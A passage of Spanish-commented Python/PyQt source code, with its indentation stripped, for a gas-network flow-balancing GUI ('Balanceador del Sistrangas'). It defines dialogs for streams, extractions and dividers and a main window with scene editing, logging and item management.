layout.addLayout(buttonLayout,4,0,1,3)
self.setLayout(layout)
self.setMinimumSize(300,50)
'''Slots'''
okButton.clicked.connect(self.accept)
cancelButton.clicked.connect(self.reject)
self.critic_checkable.toggled.connect(self.critic_stream)
self.restriccion_checkable.toggled.connect(self.critic_stream)
self.fijar_checkable.toggled.connect(self.critic_stream)
'''-------------------Funciones de StreamWindow--------------'''
def critic_stream(self):
if self.casilla=="variable":
self.critic_checkable.setCheckState(0)
if self.casilla=="restriccion":
self.restriccion_checkable.setCheckState(0)
if self.casilla=="fijar":
self.fijar_checkable.setCheckState(0)
if self.critic_checkable.checkState()!=0:
self.Flujo.setReadOnly(True)
self.Flujo.setText("x")
self.Flujo.setStyleSheet("color:rgb(128,128,128);")
self.minimo.setReadOnly(False)
self.maximo.setReadOnly(False)
self.minimo.setStyleSheet("color:rgb(0,0,0);")
self.maximo.setStyleSheet("color:rgb(0,0,0);")
self.casilla="variable"
elif self.restriccion_checkable.checkState()!=0:
self.Flujo.setReadOnly(True)
self.Flujo.setText("x")
self.Flujo.setStyleSheet("color:rgb(128,128,128);")
self.minimo.setReadOnly(False)
self.maximo.setReadOnly(False)
self.minimo.setStyleSheet("color:rgb(0,0,0);")
self.maximo.setStyleSheet("color:rgb(0,0,0);")
self.casilla="restriccion"
elif self.fijar_checkable.checkState()!=0:
self.Flujo.setReadOnly(False)
self.Flujo.setStyleSheet("color:rgb(0,0,0);")
self.minimo.setText("None")
self.maximo.setText("None")
self.minimo.setReadOnly(True)
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
self.casilla="fijar"
else:
self.Flujo.setReadOnly(False)
self.Flujo.setStyleSheet("color:rgb(0,0,0);")
self.minimo.setText("None")
self.maximo.setText("None")
self.minimo.setReadOnly(True)
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
self.casilla=""
def accept(self):
try:
if self.Nombre.text()=="Asigne un nombre a la corriente" or self.Nombre.text()=="":
if len(streams)==0:
self.Nombre.setText("1")
else:
n=len(streams)
n+=1
self.Nombre.setText(str(n))
else:
if flag==False:
name=""
name_lis=self.Nombre.text().split()
for i in name_lis:
name+=i
name+=" "
self.Nombre.setText(name)
while self.Nombre.text()[0]==" ":
self.Nombre.setText(self.Nombre.text()[1:])
while self.Nombre.text()[-1]==" ":
self.Nombre.setText(self.Nombre.text()[0:-1])
if self.Nombre.text() in streams:
QMessageBox.warning(self, "Error de especificación","Ya existe una corriente con el nombre asignado, favor de asignar un nombre diferente")
return
if self.Nombre.text() in spliters:
self.Nombre.setText("Corriente "+self.Nombre.text())
if "Divisor" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Divisor'")
return
if "Extracción" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Extracción'")
return
elif flag==True:
name=""
name_lis=self.Nombre.text().split()
for i in name_lis:
name+=i
name+=" "
self.Nombre.setText(name)
while self.Nombre.text()[0]==" ":
self.Nombre.setText(self.Nombre.text()[1:])
while self.Nombre.text()[-1]==" ":
self.Nombre.setText(self.Nombre.text()[0:-1])
if self.name!=self.Nombre.text():
if self.Nombre.text() in streams:
QMessageBox.warning(self, "Error de especificación","Ya existe una corriente con el nombre asignado, favor de asignar un nombre diferente")
return
if self.Nombre.text() in spliters:
self.Nombre.setText("Corriente "+self.Nombre.text())
if "Divisor" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Divisor'")
return
if "Extracción" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Extracción'")
return
if self.critic_checkable.checkState()!=0 or self.restriccion_checkable.checkState()!=0:
minimo=self.minimo.text()
maximo=self.maximo.text()
minimo=float(minimo)
maximo=float(maximo)
if maximo < minimo:
QMessageBox.warning(self,"Error en limites","Los limites tienen que ser de la forma mínimo < máximo")
return
flujo=self.Flujo.text()
if flujo=="" or flujo=="x":
self.Flujo.setText("")
QDialog.accept(self)
else:
flujo=float(flujo)
QDialog.accept(self)
except:
QMessageBox.warning(self,"Error de flujo","Ningún flujo puede ser texto (Mínimo, máximo, flujo)")
return
###----------------------------------------------------------------------------------###
'''----------------------------------------------------------------------------------'''
###----------------------------------------------------------------------------------###
class ExtractionWindow(QDialog):
def __init__(self,parent=None):
super(ExtractionWindow,self).__init__(parent)
nombreLabel=QLabel("Nombre")
flujoLabel=QLabel("Flujo")
if flag==False:
self.Nombre=QLineEdit("Asigne un nombre a la extracción")
self.Nombre.selectAll()
self.Flujo=QLineEdit("")
self.setWindowTitle("Nueva extracción")
elif flag==True:
item=form.scene.selectedItems()
item=item[0]
self.name=MainWindow.get_itemName(form,item)
self.Nombre=QLineEdit(self.name)
self.Nombre.selectAll()
self.Flujo=QLineEdit(str(streams[self.name].Flujo))
if streams[self.name].editable()!=True:
self.Flujo.setReadOnly(True)
self.setWindowTitle("Extracción")
okButton=QPushButton("&OK")
cancelButton=QPushButton("Cancel")
buttonLayout=QHBoxLayout()
buttonLayout.addStretch()
buttonLayout.addWidget(okButton)
buttonLayout.addWidget(cancelButton)
layout=QGridLayout()
layout.addWidget(nombreLabel,0,0)
layout.addWidget(self.Nombre,0,1)
layout.addWidget(flujoLabel,1,0)
layout.addWidget(self.Flujo,1,1)
layout.addLayout(buttonLayout,2,0,1,3)
self.setLayout(layout)
self.setMinimumSize(300,50)
'''Slots'''
okButton.clicked.connect(self.accept)
cancelButton.clicked.connect(self.reject)
'''----------------------------------------------'''
'''------------Funciones de 'ExtraccionWIndow'----------'''
def accept(self):
try:
flujo=self.Flujo.text()
flujo=float(flujo)
if self.Nombre.text()=="Asigne un nombre a la extracción" or self.Nombre.text()=="":
global streams
if len(streams)==0:
self.Nombre.setText("1")
else:
n=len(streams)
n+=1
self.Nombre.setText(str(n))
else:
name=""
name_lis=self.Nombre.text().split()
for i in name_lis:
name+=i
name+=" "
self.Nombre.setText(name)
while self.Nombre.text()[-1]==" ":
self.Nombre.setText(self.Nombre.text()[0:-1])
while self.Nombre.text()[0]==" ":
self.Nombre.setText(self.Nombre.text()[1:])
if flag==False:
if self.Nombre.text() in streams:
QMessageBox.warning(self, "Error de especificación","Ya existe una extracción con el nombre asignado, favor de asignar un nombre diferente")
return
if self.Nombre.text() in spliters:
self.Nombre.setText("Extracción "+self.Nombre.text())
if "Divisor" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Divisor'")
return
if "Corriente" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Corriente'")
return
if flag==True:
if self.name!=self.Nombre.text():
if self.Nombre.text() in streams:
QMessageBox.warning(self, "Error de especificación","Ya existe una extracción con el nombre asignado, favor de asignar un nombre diferente")
return
if self.Nombre.text() in spliters:
self.Nombre.setText("Extracción "+ self.Nombre.text())
if "Divisor" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Divisor'")
return
if "Corriente" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Corriente'")
return
QDialog.accept(self)
except:
if flujo=="" or flujo=="Favor de assignar un flujo":
self.Flujo.setText("Favor de assignar un flujo")
self.Flujo.selectAll()
self.Flujo.setFocus()
return
else:
self.Flujo.setText("El flujo debe de ser un numero")
self.Flujo.selectAll()
self.Flujo.setFocus()
return
###---------------------------------------------------------------------------####
'''---------------------------------------------------------------------------'''
###---------------------------------------------------------------------------####
class DivisorWindow(QDialog):
def __init__(self,parent=None):
super(DivisorWindow,self).__init__(parent)
self.NombreLabel=QLabel("Nombre")
self.EntradasLabel=QLabel("Entradas")
self.SalidasLabel=QLabel("Salidas")
self.Entradas_seleccionadas_Label=QLabel("Entradas seleccionadas")
self.Salidas_seleccionadas_Label=QLabel("Salidas seleccionadas")
self.Nombre=QLineEdit("Asigne nombre al divisor")
self.textbox=QLineEdit("Buscar corriente")
self.Entradas=[] #Lists to parse to spliter object
self.Salidas=[]
self.offset_inlets=0
self.offset_outlets=0
'''Seteo de checklist'''
#Declaración de elementos necesarios para el seteo de la lista
self.entradas_list=QListView()
self.salidas_list=QListView()
self.inlet_list=QListView()
self.outlet_list=QListView()
self.model_inlets=QStandardItemModel()
self.model_outlets=QStandardItemModel()
self.inside_streams=[] #Lista de corrientes dentro del dialogo
#Obtención de lista de corrientes
for i in streams:
self.inside_streams.append(streams[i].name)
self.inside_streams.sort()
#seteo
'''Creación o modificación'''
if flag==True:
item=form.scene.selectedItems()
item=item[0]
self.name=MainWindow.get_itemName(form,item)
self.Nombre.setText(self.name)
selected_inlets=spliters[self.name].entradas
selected_outlets=spliters[self.name].salidas
for i in self.inside_streams:
item=QStandardItem(i)
item.setCheckable(True)
if i in selected_inlets:
item.setCheckState(1)
self.Entradas.append(i)
self.model_inlets.appendRow(item)
item=QStandardItem(i)
item.setCheckable(True)
if i in selected_outlets:
item.setCheckState(1)
self.Salidas.append(i)
self.model_outlets.appendRow(item)
self.model_entradas=QStandardItemModel()
self.model_salidas=QStandardItemModel()
for i in self.Entradas:
item=QStandardItem(i)
item.setEnabled(False)
self.model_entradas.appendRow(item)
self.model_salidas=QStandardItemModel()
for i in self.Salidas:
item=QStandardItem(i)
item.setEnabled(False)
self.model_salidas.appendRow(item)
self.salidas_list.setModel(self.model_salidas)
self.entradas_list.setModel(self.model_entradas)
self.inlet_list.setModel(self.model_inlets)
self.outlet_list.setModel(self.model_outlets)
else:
for i in self.inside_streams:
item=QStandardItem(i)
item.setCheckable(True)
self.model_inlets.appendRow(item)
item=QStandardItem(i)
item.setCheckable(True)
self.model_outlets.appendRow(item)
self.inlet_list.setModel(self.model_inlets)
self.outlet_list.setModel(self.model_outlets)
''' Botones "ok" y "cancel"'''
okButton=QPushButton("&OK")
cancelButton=QPushButton("Cancel")
buttonLayout=QHBoxLayout()
buttonLayout.addStretch()
buttonLayout.addWidget(okButton)
buttonLayout.addWidget(cancelButton)
'''Seteo de grid y layout'''
layout=QGridLayout()
layout.addWidget(self.NombreLabel,0,0)
layout.addWidget(self.Nombre,0,1)
layout.addWidget(self.EntradasLabel,1,0)
layout.addWidget(self.SalidasLabel,1,1)
layout.addWidget(self.inlet_list,2,0)
layout.addWidget(self.outlet_list,2,1)
layout.addWidget(self.textbox,3,0,1,3)
layout.addWidget(self.Entradas_seleccionadas_Label,4,0)
layout.addWidget(self.Salidas_seleccionadas_Label,4,1)
layout.addWidget(self.entradas_list,5,0)
layout.addWidget(self.salidas_list,5,1)
layout.addLayout(buttonLayout,6,0,1,3)
self.setLayout(layout)
self.setWindowTitle("Nuevo divisor")
self.setMinimumSize(300,50)
'''Slots'''
okButton.clicked.connect(self.accept)
cancelButton.clicked.connect(self.reject)
self.textbox.textChanged.connect(self.refresh_list)
self.model_inlets.itemChanged.connect(self.item_changed_inlets)
self.model_outlets.itemChanged.connect(self.item_changed_outlets)
self.textbox.selectAll()
self.textbox.setFocus()
'''------------------------------------------'''
'''-----Funciones de 'DivisorWindow'---------'''
'''--------------------------------------------'''
def refresh_list(self):
self.model_outlets=QStandardItemModel()
self.model_inlets=QStandardItemModel()
self.model_inlets.itemChanged.connect(self.item_changed_inlets)
self.model_outlets.itemChanged.connect(self.item_changed_outlets)
if self.textbox.text()=="":
for i in self.inside_streams:
item=QStandardItem(i)
item.setCheckable(True)
if i in self.Entradas:
item.setCheckState(1)
self.model_inlets.appendRow(item)
item=QStandardItem(i)
item.setCheckable(True)
if i in self.Salidas:
item.setCheckState(1)
self.model_outlets.appendRow(item)
self.inlet_list.setModel(self.model_inlets)
self.outlet_list.setModel(self.model_outlets)
else:
for stream in self.inside_streams:
if self.textbox.text() in stream:
item=QStandardItem(stream)
item.setCheckable(True)
if stream in self.Entradas:
item.setCheckState(1)
self.model_inlets.appendRow(item)
item=QStandardItem(stream)
item.setCheckable(True)
if stream in self.Salidas:
item.setCheckState(1)
self.model_outlets.appendRow(item)
self.inlet_list.setModel(self.model_inlets)
self.outlet_list.setModel(self.model_outlets)
def item_changed_inlets(self,item):
if item.checkState()!=0 and item.text() not in self.Entradas:
self.Entradas.append(item.text())
elif item.checkState()==0 and item.text() in self.Entradas:
self.Entradas.remove(item.text())
self.model_entradas=QStandardItemModel()
for i in self.Entradas:
item=QStandardItem(i)
item.setEnabled(False)
self.model_entradas.appendRow(item)
self.entradas_list.setModel(self.model_entradas)
def item_changed_outlets(self,item):
if item.checkState()!=0 and item.text() not in self.Salidas:
self.Salidas.append(item.text())
elif item.checkState()==0 and item.text() in self.Salidas:
self.Salidas.remove(item.text())
self.model_salidas=QStandardItemModel()
for i in self.Salidas:
item=QStandardItem(i)
item.setEnabled(False)
self.model_salidas.appendRow(item)
self.salidas_list.setModel(self.model_salidas)
def accept(self):
if len(self.Entradas)==0 or len(self.Salidas)==0:
QMessageBox.warning(self, "Error de especificación","Es necesario especificar por lo menos una corriente de entrada y una corriente de salida")
return
else:
for i in self.Entradas:
if i in self.Salidas:
QMessageBox.warning(self, "Error de especificación","Una misma corriente no puede ser entrada y salida a la vez")
return
if self.Nombre.text()=="Asigne nombre al divisor" or self.Nombre.text()=="":
name_divisor=len(spliters)
if name_divisor==0:
name_divisor+=1
self.Nombre.setText("Divisor "+str(name_divisor))
else:
name_divisor+=1
while "Divisor "+str(name_divisor) in spliters:
name_divisor+=1
self.Nombre.setText("Divisor "+str(name_divisor))
else:
if len(spliters)==0:
QDialog.accept(self)
else:
if flag==False:
name=""
name_lis=self.Nombre.text().split()
for i in name_lis:
name+=i
name+=" "
self.Nombre.setText(name)
while self.Nombre.text()[0]==" ":
self.Nombre.setText(self.Nombre.text()[1:])
while self.Nombre.text()[-1]==" ":
self.Nombre.setText(self.Nombre.text()[0:-1])
if self.Nombre.text() in streams:
self.Nombre.setText("Divisor "+self.Nombre.text())
if self.Nombre.text() in spliters:
QMessageBox.warning(self, "Error de especificación","Ya existe un divisor con el nombre asignado. Favor de asignar un nombre diferente")
return
if self.Nombre.text() in spliters:
QMessageBox.warning(self, "Error de especificación","Ya existe un divisor con el nombre asignado. Favor de asignar un nombre diferente")
return
if "Corriente" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Corriente'")
return
if "Extracción" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Extracción'")
return
elif flag==True:
name=""
name_lis=self.Nombre.text().split()
for i in name_lis:
name+=i
name+=" "
self.Nombre.setText(name)
while self.Nombre.text()[0]==" ":
self.Nombre.setText(self.Nombre.text()[1:])
while self.Nombre.text()[-1]==" ":
self.Nombre.setText(self.Nombre.text()[0:-1])
if self.name!=self.Nombre.text():
if self.Nombre.text() in streams:
self.Nombre.setText("Divisor "+self.Nombre.text())
if self.Nombre.text() in spliters:
QMessageBox.warning(self, "Error de especificación","Ya existe un divisor con el nombre asignado. Favor de asignar un nombre diferente")
return
if "Corriente" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Corriente'")
return
if "Extracción" in self.Nombre.text():
QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Extracción'")
return
else:
QDialog.accept(self)
QDialog.accept(self)
#########################################################################################################################
'''-------------------------------------------------------------------------------------------------------------------'''
#########################################################################################################################
class MainWindow(QMainWindow):
def __init__(self,parent=None):
#Main Window
super(MainWindow,self).__init__(parent)
self.filename=""
self.prevPoint=QPoint()
self.setWindowTitle("Balanceador del Sistrangas----")
self.addOffset=5
self.setWindowIcon(QIcon(":/LogoCenagas.png"))
self.prevPoint=QPoint()
self.tol=0.00001
self.max_it=50
'''---------------'''
'''Actions & Icons'''
#Icons para paleta de botones
#Stream Icon
self.AddStream=QPushButton("")
self.AddStream.setIcon(QIcon(":/stream_button.png"))
self.AddStream.setIconSize(QSize(80,20))
helpText="Create a new stream"
self.AddStream.setToolTip(helpText)
self.AddStream.setStatusTip(helpText)
self.AddStream.clicked.connect(self.addStreamFun)
#Extraccion Icon
self.AddExtraccion=QPushButton("")
self.AddExtraccion.setIcon(QIcon(":/extraction_button.png"))
self.AddExtraccion.setIconSize(QSize(80,20))
helpText="Create a new extraccion"
self.AddExtraccion.setToolTip(helpText)
self.AddExtraccion.setStatusTip(helpText)
self.AddExtraccion.clicked.connect(self.addExtractionFun)
#Divisor Icon
self.AddDivisor=QPushButton("")
self.AddDivisor.setIcon(QIcon(":/Divisor.png"))
self.AddDivisor.setIconSize(QSize(80,20))
helpText="Create a new divisor"
self.AddDivisor.setToolTip(helpText)
self.AddDivisor.setStatusTip(helpText)
self.AddDivisor.clicked.connect(self.addDivisorFun)
#Rotate Icon
self.RotateIcon=QPushButton("")
self.RotateIcon.setIcon(QIcon(":/rotate_button.png"))
self.RotateIcon.setIconSize(QSize(80,20))
helpText="Rotate Icon"
self.RotateIcon.setToolTip(helpText)
self.RotateIcon.setStatusTip(helpText)
self.RotateIcon.clicked.connect(self.rotate)
#Cenagas Icon
self.CenagasLogo=QLabel("")
pixmap=QPixmap(":/Cenagas.png")
pixmap_resized=pixmap.scaled(300,75.09)
self.CenagasLogo.setPixmap(pixmap_resized)
#Icons para tool bars
#New Document Icon
self.fileNewAction=QAction(QIcon(":/add-new-document.png"),"&New",self)
self.fileNewAction.setShortcut(QKeySequence.New)
helpText="Create a new document"
self.fileNewAction.setToolTip(helpText)
self.fileNewAction.setStatusTip(helpText)
self.fileNewAction.triggered.connect(self.new_file)
#Settings Icon
self.settingsAction=QAction(QIcon(""),"Settings",self)
self.settingsAction.setToolTip("Modificar parámetros de cálculo")
self.settingsAction.triggered.connect(self.modify_settings)
#Text Icon
self.addTextAction=QAction(QIcon(""),"Agregar cuadro de texto",self)
self.addTextAction.setToolTip("Agregar cuadro de texto a la escena")
self.addTextAction.triggered.connect(self.addText)
#Run calculation Icon
self.runCalculation=QAction(QIcon(":/run.png"),"&Run",self)
self.runCalculation.setShortcut("F5")
self.runCalculation.setToolTip("Run calculation. (F5)")
self.runCalculation.setStatusTip("Run calculation")
self.runCalculation.triggered.connect(self.run_all)
#Save Icon
self.save_action=QAction(QIcon(":/add-new-document.png"),"&Save",self)
self.save_action.setShortcut(QKeySequence.Save)
helpText="Save document"
self.save_action.setToolTip(helpText)
self.save_action.setStatusTip(helpText)
self.save_action.triggered.connect(self.save)
#Save as Icon
self.save_as_action=QAction(QIcon(":/add-new-document.png"),"Save as",self)
helpText="Save document as"
self.save_as_action.setToolTip(helpText)
self.save_as_action.setStatusTip(helpText)
self.save_as_action.triggered.connect(self.save_as)
#Open Icon
self.open_action=QAction(QIcon(":/add-new-document.png"),"&Open",self)
self.open_action.setShortcut(QKeySequence.Open)
helpText="Open document"
self.open_action.setToolTip(helpText)
self.open_action.setToolTip(helpText)
self.open_action.triggered.connect(self.Open)
#Import data from Excel Icon
self.import_from_excel=QAction(QIcon(":/excel.png"),"Import from excel",self)
self.import_from_excel.setShortcut("Ctrl+L")
self.import_from_excel.setToolTip("Importar datos de excel")
self.import_from_excel.triggered.connect(self.importf)
#Reset Streams
self.reset_streams=QAction(QIcon(":/reset.png"),"Reset Streams",self)
self.reset_streams.setShortcut("Ctrl+R")
self.reset_streams.setToolTip("Reset Streams")
self.reset_streams.triggered.connect(self.resetf)
'''--------------------------'''
'''Docked widgets'''
#Graphics window
self.view=GraphicsView(self)
self.scene=QGraphicsScene(self)
self.scene.setSceneRect(0,0,PageSize[0],PageSize[1])
self.view.setScene(self.scene)
self.view.setAlignment(Qt.AlignCenter)
self.view.setContextMenuPolicy(Qt.ActionsContextMenu)
self.view.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
self.view.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
self.view.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)
self.marco()
# Paleta de botones
self.Widget=QWidget(self)
self.Widget.setLayout(QVBoxLayout())
self.GridWidgetProceso=QGridLayout()
self.GridWidgetProceso.addWidget(self.CenagasLogo,0,0,0,4)
self.GridWidgetProceso.addWidget(self.AddStream,1,0)
self.GridWidgetProceso.addWidget(self.AddExtraccion,1,1)
self.GridWidgetProceso.addWidget(self.AddDivisor,1,2)
self.GridWidgetProceso.addWidget(self.RotateIcon,1,3)
self.Widget.layout().addLayout(self.GridWidgetProceso)
#Ventana de eventos
self.logDockWidget=QDockWidget("Log",self)
self.logDockWidget.setObjectName("LogDockWidget")
self.listWidget=QTextBrowser()
self.logDockWidget.setWidget(self.listWidget)
#Status Bar
self.sizeLabel=QLabel()
self.sizeLabel.setFrameStyle(QFrame.Sunken)
status=self.statusBar()
status.setSizeGripEnabled(True)
status.addPermanentWidget(self.sizeLabel)
status.showMessage("Ready",10000)
'''---------------'''
'''Menus'''
fileMenu=self.menuBar().addMenu("File")
fileMenu.addAction(self.fileNewAction)
fileToolbar=self.addToolBar("File")
fileToolbar.setObjectName("FileToolBar")
fileToolbar.addAction(self.fileNewAction)
#Tools menu
toolsMenu=self.menuBar().addMenu("Herramientas")
toolsMenu.addAction(self.settingsAction)
toolsMenu.addAction(self.addTextAction)
#Run calculation icon and bar
processToolbar=self.addToolBar("Process")
processToolbar.setObjectName("ProcessToolBar")
processToolbar.addAction(self.runCalculation)
#Import from excel icon bar
processToolbar.addAction(self.import_from_excel)
#Reset Streams icon bar
processToolbar.addAction(self.reset_streams)
#Save
fileMenu.addAction(self.save_action)
fileMenu.addAction(self.save_as_action)
#Open
fileMenu.addAction(self.open_action)
#Open new file
fileMenu.addAction(self.fileNewAction)
'''----------------------------'''
'''Spliters'''
self.ProcesoSplitter=QSplitter(Qt.Vertical)
self.ProcesoSplitter.addWidget(self.Widget)
self.ProcesoSplitter.addWidget(self.logDockWidget)
self.mainSplitter=QSplitter(Qt.Horizontal)
self.mainSplitter.addWidget(self.view)
self.mainSplitter.addWidget(self.ProcesoSplitter)
self.setCentralWidget(self.mainSplitter)
'''_______________---------__________________'''
'''---------------Funciones------------------'''
'''_______________---------__________________'''
def addText(self):
dialog=TextItemDlg(position=self.position(),scene=self.scene,parent=self)
dialog.exec_()
def resetf(self):
for stream in streams:
if streams[stream].editable()!=True:
streams[stream].Flujo="x"
streams[stream].edit=True
for item in self.scene.items():
name=self.get_itemName(item)
if name in streams:
item.setToolTip("Nombre: "+name+"\n Flujo: "+str(streams[name].Flujo))
self.updateLog("Streams reset")
def marco(self):
rect=QRectF(0,0,PageSize[0],PageSize[1])
self.scene.addRect(rect,Qt.black)
margin=0.01
for i in range(0,100):
self.scene.addRect(rect.adjusted(margin,margin,-margin,-margin))
margin+=0.01
def rotate(self):
for item in self.scene.selectedItems():
if item.rotation()==360:
item.setRotation(0)
angle=30+item.rotation()
item.setRotation(angle)
def position(self):
point=self.mapFromGlobal(QCursor.pos())
if not self.view.geometry().contains(point):
coord=random.randint(0,144)
point=QPoint(coord,coord)
else:
if point==self.prevPoint:
point+=QPoint(self.addOffset,self.addOffset)
self.addOffset+=50
else:
self.prevPoint=point
return self.view.mapToScene(point)
def modify_settings(self):
dialog=settingsWindow(self)
if dialog.exec_():
self.tol=float(dialog.Tolerancia.text())
self.max_it=int(dialog.Iteraciones.text())
self.updateLog("Parámetros de cálculo modificados")
self.updateLog("Máximo número de iteraciones: "+str(self.max_it)+" Tolerancia: "+str(self.tol))
def addStreamFun(self):
dialog=StreamWindow(self)
if dialog.exec_():
item=graphic_object()
pixmap=QPixmap(":/Stream.png")
group_test=QGraphicsItemGroup()
item.setPixmap(pixmap.scaled(200,100))
item.setPos(self.position())
a=self.addItemF(item,dialog,"Corriente")
#Add to scene
self.scene.clearSelection()
test_name=self.get_itemName(item)
self.scene.addItem(item)
item.setSelected(True)
def addExtractionFun(self):
''' Validador del dialogo "extraccion" '''
dialog=ExtractionWindow(self)
if dialog.exec_():
item=graphic_object()
pixmap=QPixmap(":/Extraccion.png")
item.setPixmap(pixmap.scaled(200,100))
item.setPos(self.position())
self.scene.clearSelection()
self.addItemF(item,dialog,"Extraccion") #Para añadir info y corriente a lista global de corrientes. Funcion definida por mi
test_name=self.get_itemName(item)
if test_name==dialog.Nombre.text():
self.scene.addItem(item)
item.setSelected(True)
else:
if test_name!="":
del streams[dialog.Nombre.text()]
dialog.Nombre.setText(test_name)
self.addItemF(item,dialog,"Extraccion")
try:
test_name=self.get_itemName(item)
streams[test_name]
self.scene.addItem(item)
item.setSelected(True)
except:
self.updateLog("<font color=red>Error al crear extracción, favor de crearla de nuevo</font>")
del streams[dialog.Nombre.text()]
else:
self.updateLog("<font color=red>Error al crear extracción, favor de crearla de nuevo</font>")
del streams[dialog.Nombre.text()]
def addDivisorFun(self):
dialog=DivisorWindow(self)
if dialog.exec_():
item=graphic_object()
pixmap=QPixmap(":/Divisor.png")
item.setPixmap(pixmap.scaled(200,100))
item.setPos(self.position())
self.scene.clearSelection()
a=self.addItemF(item,dialog,"Divisor")
test_name=self.get_itemName(item)
if test_name==dialog.Nombre.text():
self.scene.addItem(item)
item.setSelected(True)
else:
if test_name!="":
del spliters[dialog.Nombre.text()]
dialog.Nombre.setText(test_name)
self.addItemF(item,dialog,"Divisor")
try:
test_name=self.get_itemName(item)
spliters[test_name]
self.scene.addItem(item)
item.setSelected(True)
except:
self.updateLog("<font color=red>Error al crear divisor, favor de crearla de nuevo</font>")
del spliters[dialog.Nombre.text()]
else:
self.updateLog("<font color=red>Error al crear divisor, favor de crearla de nuevo</font>")
del splters[dialog.Nombre.text()]
def updateLog(self,message):
self.statusBar().showMessage(message,5000)
self.listWidget.append(message)
def addItemF(self,item,dialog,tipo):
if tipo=="Extraccion" or tipo=="Corriente":
stream=Stream(dialog.Nombre.text())
flujo=dialog.Flujo.text()
if flujo=="":
flujo="x"
else:
flujo=float(flujo)
if tipo=="Corriente":
if dialog.critic_checkable.checkState()!=0 or dialog.restriccion_checkable.checkState()!=0:
minimo=float(dialog.minimo.text())
maximo=float(dialog.maximo.text())
limits=(minimo,maximo)
stream.limits=limits
if dialog.critic_checkable.checkState()!=0:
stream.critic="variable"
variables.append(stream.name)
else:
stream.critic="restriccion"
restricciones.append(stream.name)
elif dialog.fijar_checkable.checkState()!=0:
stream.fixed=True
stream.Flujo(flujo)
stream.Tipo(tipo)
global streams
streams[stream.name]=stream
if stream.name in streams:
item.setToolTip("Nombre: "+stream.name+"\n Flujo: "+str(stream.Flujo))
self.updateLog(str(stream.Tipo)+" añadida con el nombre: "+str(stream.name))
return "ok"
else:
return "error"
elif tipo=="Divisor":
spliter=Spliter(dialog.Nombre.text())
spliter.entradas(dialog.Entradas)
spliter.salidas(dialog.Salidas)
global spliters
spliters[spliter.name]=spliter
spliters[spliter.name].status("Unsolved")
if spliter.name in spliters:
item.setToolTip("Nombre: "+''+str(dialog.Nombre.text()))
self.updateLog(str(tipo)+" añadido con el nombre: "+str(spliter.name))
return "ok"
else:
return "error"
def get_itemName(self,item):
tool_tip=item.toolTip()
tool_tip_lis=tool_tip.split()
i=1
name=""
if "Flujo:" in tool_tip_lis:
while tool_tip_lis[i]!="Flujo:":
name+=tool_tip_lis[i]
if tool_tip_lis[i+1]!="Flujo:":
name+=" "
i+=1
elif "Nombre:" in tool_tip_lis and not "Flujo:" in tool_tip_lis:
for i in range(0,len(tool_tip_lis)):
if i!=0:
name+=tool_tip_lis[i]
if i!=len(tool_tip_lis)-1 and i!=0:
name+=" "
return name
def solve_unique(self,spliter,tol):
ans=node(streams,spliters[spliter],tol)
if ans[0]==0 or ans[0]==1:
corrientes=[]
for i in spliters[spliter].entradas:
corrientes.append(i)
for i in spliters[spliter].salidas:
corrientes.append(i)
for item in self.scene.items():
name=self.get_itemName(item) #Obtiene el nombre de la corriente en item
for corriente in corrientes:
name_2=name.replace(" ","")
corriente_2=corriente.replace(" ","")
if name_2==corriente_2:
item.setToolTip("Nombre: "+corriente+"\n Flujo: "+str(streams[corriente].Flujo))
def delete_item(self):
for item in self.scene.selectedItems():
self.scene.removeItem(item)
name=self.get_itemName(item)
if name in streams:
del streams[name]
self.updateLog("Stream: "+str(name)+" deleted")
for spliter in spliters:
if name in spliters[spliter].entradas:
for entrada in spliters[spliter].entradas:
if name==entrada:
spliters[spliter].entradas.remove(name)
if name in spliters[spliter].salidas:
for salida in spliters[spliter].salidas:
if name==salida:
spliters[spliter].salidas.remove(name)
if name in spliters:
del spliters[name]
self.updateLog("Spliter: "+str(name)+" deleted")
def modify_item(self):
global flag
global streams
item=self.scene.selectedItems()
if len(item)>1:
QMessageBox.warning(self, "Error","Seleccione solo un elemento por favor.")
else:
item=item[0]
name=str(self.get_itemName(item))
if name in streams:
tipo=streams[name].Tipo
flag=True
if tipo=="Corriente":
dialog=StreamWindow(self)
elif tipo=="Extraccion":
dialog=ExtractionWindow(self)
if dialog.exec_():
name_before=streams[name].name
flujo_before=streams[name].Flujo
critic_before=streams[name].is_critic()
fixed_before=streams[name].is_fixed()
limits_before=streams[name].get_limits()
if dialog.Nombre.text()==name:
#Si lo que cambio fue el flujo.....
flujo=dialog.Flujo.text()
if flujo=="" or flujo=="x":
flujo="x"
else:
flujo=float(flujo)
streams[name].Flujo=flujo
stream=streams[name]
item.setToolTip("Nombre: "+stream.name+"\n Flujo: "+str(stream.Flujo))
else:
#Si lo que cambio fue el nombre.....
item.setToolTip("Nombre: "+dialog.Nombre.text()+"\n Flujo: "+str(dialog.Flujo.text()))
stream=Stream(dialog.Nombre.text())
flujo=dialog.Flujo.text()
if flujo=="" or flujo=="x":
